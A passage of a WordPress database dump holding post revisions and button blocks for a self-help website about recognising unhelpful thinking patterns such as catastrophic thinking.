href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->', 'Change negative thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-06-06 17:45:31', '2023-06-06 17:45:31', '', 88, 'https://www.happythinking.com/?p=1746', 0, 'revision', '', 0),
(1579, 1, '2023-05-30 10:02:34', '2023-05-30 10:02:34', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"id":1578,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image size-full"><img src="https://www.happythinking.com/wp-content/uploads/home_happythinking300523.jpg" alt="" class="wp-image-1578"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Oneâ€™s mind plays a very important role in oneâ€™s happiness. Over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing. In this website, I will describe to you, in an easy to understand way, various types of unhelpful thinking, so that you will be able to recognise such thinking when it happens in your mind. And very importantly, I will also give you practical ways to prevent such thinking from affecting you in a negative way. In essence, Happy Thinking is about not letting unhelpful ways of thinking get in the way of your happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This website is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc). My sincere hope is that it will bring you happiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/test/">test images</a></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-05-30 10:02:34', '2023-05-30 10:02:34', '', 88, 'https://www.happythinking.com/?p=1579', 0, 'revision', '', 0),
(1572, 1, '2023-05-29 04:49:19', '2023-05-29 04:49:19', '<!-- wp:columns {"align":"full"} -->\n<div class="wp-block-columns alignfull"><!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"50%"} -->\n<div class="wp-block-column" style="flex-basis:50%"><!-- wp:image {"id":1251,"sizeSlug":"full","linkDestination":"none"} -->\n<figure class="wp-block-image size-full"><img src="https://www.happythinking.com/wp-content/uploads/2021/08/home_stupid300821.gif" alt="" class="wp-image-1251"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column {"width":"25%"} -->\n<div class="wp-block-column" style="flex-basis:25%"></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p>A universal desire of all human beings is to be happy. However, this can be quite challenging to achieve in our modern world which is full of high demands and stress. This website can help you to be happy and it is truly free for you to benefit from (i.e. there is nothing to buy, download, register, etc).&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The human mind â€œthinksâ€ in extremely complex ways and in many ways that is what makes all of us amazingly different from each other. The way oneâ€™s mind does its â€œthinkingâ€ plays a very important role in oneâ€™s happiness. Unfortunately, over time, oneâ€™s mind may develop certain â€œunhelpfulâ€ ways of thinking that can negatively affect oneâ€™s mental wellbeing.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The aim of this website is to help you to recognise unhelpful ways of thinking when it happens in your mind and to show you practical ways to prevent such thinking from affecting you in a negative way.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click the button below to start reading about Happy Thinking.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com/introduction/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"27px"} -->\n<div style="height:27px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:separator {"opacity":"css","className":"is-style-wide"} -->\n<hr class="wp-block-separator has-css-opacity is-style-wide"/>\n<!-- /wp:separator -->\n\n<!-- wp:heading {"level":3} -->\n<h3 class="wp-block-heading">Menu</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/introduction/">Introduction</a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href="https://www.happythinking.com/test/">test images</a></p>\n<!-- /wp:paragraph -->', 'How to change unhelpful ways of thinking', '', 'inherit', 'closed', 'closed', '', '88-revision-v1', '', '', '2023-05-29 04:49:19', '2023-05-29 04:49:19', '', 88, 'https://www.happythinking.com/?p=1572', 0, 'revision', '', 0),
(1271, 2, '2021-08-30 05:16:56', '2021-08-30 05:16:56', '<!-- wp:buttons {"contentJustification":"center"} -->\n<div class="wp-block-buttons is-content-justification-center"><!-- wp:button {"style":{"border":{"radius":15}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link" href="https://www.brainmistakes.com/all_or_nothing/" style="border-radius:15px">Click for next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'click for next', '', 'publish', 'closed', 'closed', '', 'next-re-use', '', '', '2021-08-30 05:16:56', '2021-08-30 05:16:56', '', 0, 'https://www.stopstupidthinking.com/next-re-use/', 0, 'wp_block', '', 0),
(1297, 2, '2021-08-30 06:00:59', '2021-08-30 06:00:59', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">HOME</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'home', '', 'publish', 'closed', 'closed', '', 'home', '', '', '2023-04-10 10:35:51', '2023-04-10 10:35:51', '', 0, 'https://www.stopstupidthinking.com/home/', 0, 'wp_block', '', 0),
(1346, 2, '2021-08-31 19:09:20', '2021-08-31 19:09:20', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'prev_next_home buttons', '', 'publish', 'closed', 'closed', '', 'home_next', '', '', '2023-05-30 16:43:02', '2023-05-30 16:43:02', '', 0, 'https://www.stopstupidthinking.com/home_next/', 0, 'wp_block', '', 0),
(1443, 2, '2021-10-05 13:41:29', '2021-10-05 13:41:29', '<!-- wp:buttons -->\n<div class="wp-block-buttons"><!-- wp:button {"style":{"border":{"radius":15}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link" href="https://www.stopstupidthinking.com/negativity_effect/" style="border-radius:15px">Click to read</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->', 'Click to read', '', 'publish', 'closed', 'closed', '', 'click-to-read', '', '', '2021-10-05 13:41:29', '2021-10-05 13:41:29', '', 0, 'https://www.stopstupidthinking.com/click-to-read/', 0, 'wp_block', '', 0),
(1458, 2, '2023-02-20 18:01:33', '2023-02-20 18:01:33', '{"version": 2, "isGlobalStylesUserThemeJSON": true }', 'Custom Styles', '', 'publish', 'closed', 'closed', '', 'wp-global-styles-astra-child', '', '', '2023-02-20 18:01:33', '2023-02-20 18:01:33', '', 0, 'https://www.stopstupidthinking.com/wp-global-styles-astra-child/', 0, 'wp_global_styles', '', 0),
(1673, 1, '2023-05-30 18:53:09', '2023-05-30 18:53:09', '<!-- wp:paragraph -->\n<p>In our day to day lives, we all keep an eye out for things that may harm us. This assessment of the world around us for danger is essential for oneâ€™s â€œsurvivalâ€ and is built into our brains. It is probably something that has carried over from the time of our distant ancestors, who in their forest environment, would have had to keep a keen eye for lurking dangers such as poisonous snakes and tigers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unfortunately, this system for assessing dangers can work in an exaggerated way in some people, leading to unhelpful thinking patterns in them. I will now explain one such unhelpful thinking pattern which psychologists call â€œcatastrophic thinkingâ€. Let me use an example to explain it. Imagine that a person has a teenage daughter and that she is fifteen minutes beyond the time she usually arrives home from school. While many parents will start to be concerned when their child is late returning from school, a parent with catastrophic thinking will straight away think of only the worst possible outcome. For example, a parent with catastrophic thinking may immediately think, â€œOh no, my daughter must have met with a road traffic accident and may be bleeding to death at this very moment.â€ whereas, a parent without such thinking may think instead, â€œMaybe there is very heavy traffic on the roads, and the school bus may have got held up.â€ In fact, with catastrophic thinking, the person may add further layers of â€œworst outcomeâ€ scenarios. Continuing from the example I just gave, the further added scenarios may go like this, â€œAnd with the loss of my daughter, I would become extremely depressed, making me lose my partner and job. I will end up being homeless and sleeping on the streetâ€. With such a catastrophic imagination, the person will undergo immense unnecessary stress, probably further compromising the person''s ability to think rationally. And all this stress happens without the person having any idea of what actually has happened (By the way, in our example, the daughter was indeed stuck in the bus, in heavy traffic!). This is not to say that one should not be concerned about oneâ€™s children. Rather, it''s about having a measured level of concern. In the example, perhaps instead of imagining the worst, a better approach would have been to say look up online to see for traffic reports in the area etc.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A common theme that you will see when I discuss unhelpful thinking is that it often has to do with one not â€œseeing things the way they really areâ€. What I mean is that our brains often distort the true situation that is really present. In the example given before, yes there was a reason for the person to be concerned that his or her daughter was late, but then the thinking became unhelpful when the person''s brain exaggerated the true risk. Without further information, there was no reason for the brain to imagine the worst outcomes. An important part of happy thinking is about developing the ability to see things the way they are, rather than having an imaginary view.&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/negativity_effect/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Catastrophic thinking', '', 'inherit', 'closed', 'closed', '', '1620-revision-v1', '', '', '2023-05-30 18:53:09', '2023-05-30 18:53:09', '', 1620, 'https://www.happythinking.com/?p=1673', 0, 'revision', '', 0),
(1500, 1, '2023-08-08 15:21:43', '2023-04-10 10:08:24', '', 'Home', '', 'publish', 'closed', 'closed', '', 'home', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/2023/04/10/home/', 1, 'nav_menu_item', '', 0),
(1507, 1, '2023-08-08 15:21:43', '2023-04-10 10:08:24', ' ', '', '', 'publish', 'closed', 'closed', '', '1507', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/2023/04/10/1507/', 17, 'nav_menu_item', '', 0),
(1508, 1, '2023-08-08 15:21:43', '2023-04-10 10:08:24', ' ', '', '', 'publish', 'closed', 'closed', '', '1508', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/2023/04/10/1508/', 18, 'nav_menu_item', '', 0),
(1509, 1, '2023-08-08 15:21:43', '2023-04-10 10:08:24', ' ', '', '', 'publish', 'closed', 'closed', '', '1509', '', '', '2023-08-08 15:21:43', '2023-08-08 15:21:43', '', 0, 'https://www.happythinking.com/2023/04/10/1509/', 19, 'nav_menu_item', '', 0),
(1604, 1, '2023-05-30 16:43:02', '2023-05-30 16:43:02', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'prev_next_home buttons', '', 'inherit', 'closed', 'closed', '', '1346-revision-v1', '', '', '2023-05-30 16:43:02', '2023-05-30 16:43:02', '', 1346, 'https://www.happythinking.com/?p=1604', 0, 'revision', '', 0),
(1605, 1, '2023-05-30 16:44:22', '2023-05-30 16:44:22', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œhappy thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click below to continue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1346} /-->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-05-30 16:44:22', '2023-05-30 16:44:22', '', 1034, 'https://www.happythinking.com/?p=1605', 0, 'revision', '', 0);
INSERT INTO `wpou_posts` VALUES
(1603, 1, '2023-05-30 16:43:02', '2023-05-30 16:43:02', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œhappy thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the problem.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The first person had ways of thinking that were â€œhelpfulâ€ as they did not make the personâ€™s sadness worse. Rather, this person''s helpful ways of thinking kept his or her mind in a state where it could effectively think about potential solutions. This personâ€™s positive outlook will help the person to move on and ultimately find a replacement job.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the second personâ€™s thinking was â€œunhelpfulâ€ and made a bad situation worse. This person may well spiral into depression, which itself may make finding another job difficult.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>My ultimate aim in this website about happy thinking is to help you to recognise unhelpful thinking when it occurs in your mind and to give you mental techniques to effectively deal with such thinking. I have divided this website about Happy Thinking into two main parts:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the first part, I will describe to you, in an easy to understand way, common types of unhelpful thinking. This will help you to recognise such thinking when it happens in your mind.&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the second part, I will describe various special techniques that your mind can use to either change unhelpful thinking or help prevent such thinking from affecting you in a negative way. I like to think of such techniques, as â€œtoolsâ€, and just like a repairman will use various tools to repair something, you will be able to use these tools to deal with unhelpful thinking. These â€œtoolsâ€ are very practical so that you will be able to use them in your daily life.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In between describing unhelpful thinking and giving you tools to deal with such thinking, I will also sprinkle bits of wisdom about happiness that I have gathered from various places. Such wisdom may help you to see the world in a more accepting and positive way.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in essence, â€˜happy thinkingâ€ is about you recognising unhelpful thinking when it occurs in your mind and then using one or more tools to deal with such thinking. This along with a sprinkling of wisdom, should make you a happy person! I truly believe that you will enjoy and benefit from â€œHappy Thinkingâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Please click below to continue.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:block {"ref":1346} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->', 'Introduction', '', 'inherit', 'closed', 'closed', '', '1034-revision-v1', '', '', '2023-05-30 16:43:02', '2023-05-30 16:43:02', '', 1034, 'https://www.happythinking.com/?p=1603', 0, 'revision', '', 0),
(1600, 1, '2023-05-30 16:26:51', '2023-05-30 16:26:51', '<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/about_me/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"19px"} -->\n<div style="height:19px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'prev_next_home buttons', '', 'inherit', 'closed', 'closed', '', '1346-revision-v1', '', '', '2023-05-30 16:26:51', '2023-05-30 16:26:51', '', 1346, 'https://www.happythinking.com/?p=1600', 0, 'revision', '', 0),
(1599, 1, '2023-05-30 16:25:31', '2023-05-30 16:25:31', '<!-- wp:paragraph -->\n<p>First of all, I warmly welcome you to this website where I will tell you about â€œhappy thinkingâ€. The information I will present to you has certainly made me become a happier person and I am pleased to be able to share it with you so that you can benefit from it as well.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us begin with the question, â€œWhat do we actually mean when we say that a person is happy?â€ The answer to this basic question is not that straightforward. Despite the fact that all of us want to be happy, the concept of being â€œhappyâ€ is something that is quite difficult to define. This is because, â€œto be happyâ€ means different things to different people. I consider myself to be happy, when I am able to cope, without being stressed or depressed, with the various challenges that the world throws at me. Most of us desire to have a relatively easy life with little or no problems, but of course, the reality is that hardships and problems are part of everyone''s life. In the face of such challenges, if one is able to think in ways that are â€œhelpfulâ€ in dealing with those challenges and lets one remain calm and content, I would consider that person to be happy. This is of course not a perfect definition, but nevertheless is probably a good one to start with.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very important determinant of how happy one is, lies in the way oneâ€™s mind â€œthinksâ€. For example, imagine that two people, holding very good jobs, have been suddenly told that their company no longer needs them and that they will have to leave immediately. Both these people are now in an unfortunate situation where they will lose their generous salaries and perks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>One of these people might think, â€œWell that was a great job, but that is no more. No point thinking of what I have lost, instead, I need to start job hunting as soon as possible so I can pay my household bills.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>On the other hand, the other person might think, â€œHow terrible! Bad things only happen to me. I will never get another job. There is no point trying as the world is useless.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this example, you can see that both people had to face the same problem, but each had a markedly different way of â€œthinkingâ€ when dealing with the 